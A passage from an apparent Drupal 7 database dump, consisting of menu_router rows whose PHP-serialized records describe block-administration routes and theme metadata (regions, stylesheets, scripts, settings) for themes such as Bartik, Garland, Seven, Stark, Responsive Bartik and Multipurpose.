(inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:4:\"name\";i:2;s:6:\"slogan\";i:3;s:17:\"node_user_picture\";i:4;s:20:\"comment_user_picture\";i:5;s:25:\"comment_user_verification\";i:6;s:7:\"favicon\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:8:\"settings\";a:8:{s:17:\"slideshow_display\";s:1:\"1\";s:11:\"breadcrumbs\";s:1:\"1\";s:10:\"image_logo\";s:1:\"0\";s:18:\"socialicon_display\";s:1:\"1\";s:12:\"facebook_url\";s:39:\"http://www.facebook.com/devsaran.drupal\";s:11:\"twitter_url\";s:34:\"http://www.twitter.com/saranquardz\";s:15:\"google_plus_url\";s:49:\"https://plus.google.com/u/0/109064032428497406718\";s:13:\"pinterest_url\";s:20:\"http://pinterest.com\";}s:7:\"version\";s:7:\"7.x-1.0\";s:7:\"project\";s:12:\"multipurpose\";s:9:\"datestamp\";s:10:\"1409600329\";s:10:\"screenshot\";s:44:\"sites/all/themes/multipurpose/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:12:\"multipurpose\";}','',31,5,0,'','admin/structure/block/demo/multipurpose','Multipurpose Theme','t','','_block_custom_theme','a:1:{i:0;s:12:\"multipurpose\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/responsive_bartik','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":13:{s:8:\"filename\";s:57:\"sites/all/themes/responsive_bartik/responsive_bartik.info\";s:4:\"name\";s:17:\"responsive_bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:17:\"Responsive Bartik\";s:11:\"description\";s:86:\"A flexible, recolorable theme with many regions and a responsive, mobile-first layout.\";s:7:\"version\";s:7:\"7.x-1.0\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:17:\"responsive_bartik\";s:9:\"datestamp\";s:10:\"1413392482\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:49:\"sites/all/themes/responsive_bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:17:\"responsive_bartik\";}','',31,5,0,'','admin/structure/block/demo/responsive_bartik','Responsive Bartik','t','','_block_custom_theme','a:1:{i:0;s:17:\"responsive_bartik\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/seven','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:5:\"seven\";}','',31,5,0,'','admin/structure/block/demo/seven','Seven','t','','_block_custom_theme','a:1:{i:0;s:5:\"seven\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/demo/stark','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_demo','a:1:{i:0;s:5:\"stark\";}','',31,5,0,'','admin/structure/block/demo/stark','Stark','t','','_block_custom_theme','a:1:{i:0;s:5:\"stark\";}',0,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/bartik','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:25:\"themes/bartik/bartik.info\";s:4:\"name\";s:6:\"bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:6:\"bartik\";}','',31,5,1,'admin/structure/block','admin/structure/block','Bartik','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/bartik/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',63,6,1,'admin/structure/block/list/bartik','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/garland','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.40\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1444866674\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1444866674;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:7:\"garland\";}','',31,5,1,'admin/structure/block','admin/structure/block','Garland','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/garland/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',63,6,1,'admin/structure/block/list/garland','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/multipurpose','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":13:{s:8:\"filename\";s:47:\"sites/all/themes/multipurpose/multipurpose.info\";s:4:\"name\";s:12:\"multipurpose\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:18:\"Multipurpose Theme\";s:11:\"description\";s:112:\"Multipurpose Theme is a premium Drupal 7 theme. Developed by Devsaran.com.\";s:4:\"core\";s:3:\"7.x\";s:6:\"engine\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:7:\"regions\";a:15:{s:13:\"sidebar_first\";s:13:\"First Sidebar\";s:6:\"header\";s:6:\"Header\";s:13:\"preface_first\";s:13:\"Preface First\";s:14:\"preface_middle\";s:14:\"Preface Middle\";s:12:\"preface_last\";s:12:\"Preface Last\";s:11:\"content_top\";s:11:\"Content Top\";s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:6:\"footer\";s:6:\"Footer\";s:12:\"footer_first\";s:12:\"First Bottom\";s:13:\"footer_second\";s:13:\"Second Bottom\";s:12:\"footer_third\";s:12:\"Third Bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:4:\"name\";i:2;s:6:\"slogan\";i:3;s:17:\"node_user_picture\";i:4;s:20:\"comment_user_picture\";i:5;s:25:\"comment_user_verification\";i:6;s:7:\"favicon\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:8:\"settings\";a:8:{s:17:\"slideshow_display\";s:1:\"1\";s:11:\"breadcrumbs\";s:1:\"1\";s:10:\"image_logo\";s:1:\"0\";s:18:\"socialicon_display\";s:1:\"1\";s:12:\"facebook_url\";s:39:\"http://www.facebook.com/devsaran.drupal\";s:11:\"twitter_url\";s:34:\"http://www.twitter.com/saranquardz\";s:15:\"google_plus_url\";s:49:\"https://plus.google.com/u/0/109064032428497406718\";s:13:\"pinterest_url\";s:20:\"http://pinterest.com\";}s:7:\"version\";s:7:\"7.x-1.0\";s:7:\"project\";s:12:\"multipurpose\";s:9:\"datestamp\";s:10:\"1409600329\";s:10:\"screenshot\";s:44:\"sites/all/themes/multipurpose/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:2:{s:9:\"style.css\";s:39:\"sites/all/themes/multipurpose/style.css\";s:18:\"css/responsive.css\";s:48:\"sites/all/themes/multipurpose/css/responsive.css\";}}s:7:\"scripts\";a:3:{s:12:\"js/retina.js\";s:42:\"sites/all/themes/multipurpose/js/retina.js\";s:13:\"js/plugins.js\";s:43:\"sites/all/themes/multipurpose/js/plugins.js\";s:12:\"js/global.js\";s:42:\"sites/all/themes/multipurpose/js/global.js\";}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:12:\"multipurpose\";}','',31,5,1,'admin/structure/block','admin/structure/block','Multipurpose Theme','t','','','a:0:{}',132,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/multipurpose/add','','','user_access','a:1:{i:0;s:17:\"administer blocks\";}','drupal_get_form','a:1:{i:0;s:20:\"block_add_block_form\";}','',63,6,1,'admin/structure/block/list/multipurpose','admin/structure/block','Add block','t','','','a:0:{}',388,'','',0,'modules/block/block.admin.inc'),('admin/structure/block/list/responsive_bartik','','','_block_themes_access','a:1:{i:0;O:8:\"stdClass\":13:{s:8:\"filename\";s:57:\"sites/all/themes/responsive_bartik/responsive_bartik.info\";s:4:\"name\";s:17:\"responsive_bartik\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:17:\"Responsive Bartik\";s:11:\"description\";s:86:\"A flexible, recolorable theme with many regions and a responsive, mobile-first layout.\";s:7:\"version\";s:7:\"7.x-1.0\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:17:\"responsive_bartik\";s:9:\"datestamp\";s:10:\"1413392482\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:49:\"sites/all/themes/responsive_bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:5:\"mtime\";i:1434659475;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:49:\"sites/all/themes/responsive_bartik/css/layout.css\";s:13:\"css/style.css\";s:48:\"sites/all/themes/responsive_bartik/css/style.css\";s:14:\"css/colors.css\";s:49:\"sites/all/themes/responsive_bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:48:\"sites/all/themes/responsive_bartik/css/print.css\";}}s:7:\"scripts\";a:1:{s:22:\"js/collapsible-menu.js\";s:57:\"sites/all/themes/responsive_bartik/js/collapsible-menu.js\";}s:6:\"engine\";s:11:\"phptemplate\";}}','block_admin_display','a:1:{i:0;s:17:\"responsive_bartik\";}','',31,5,1,'admin/structure/block','admin/structure/block','Responsive 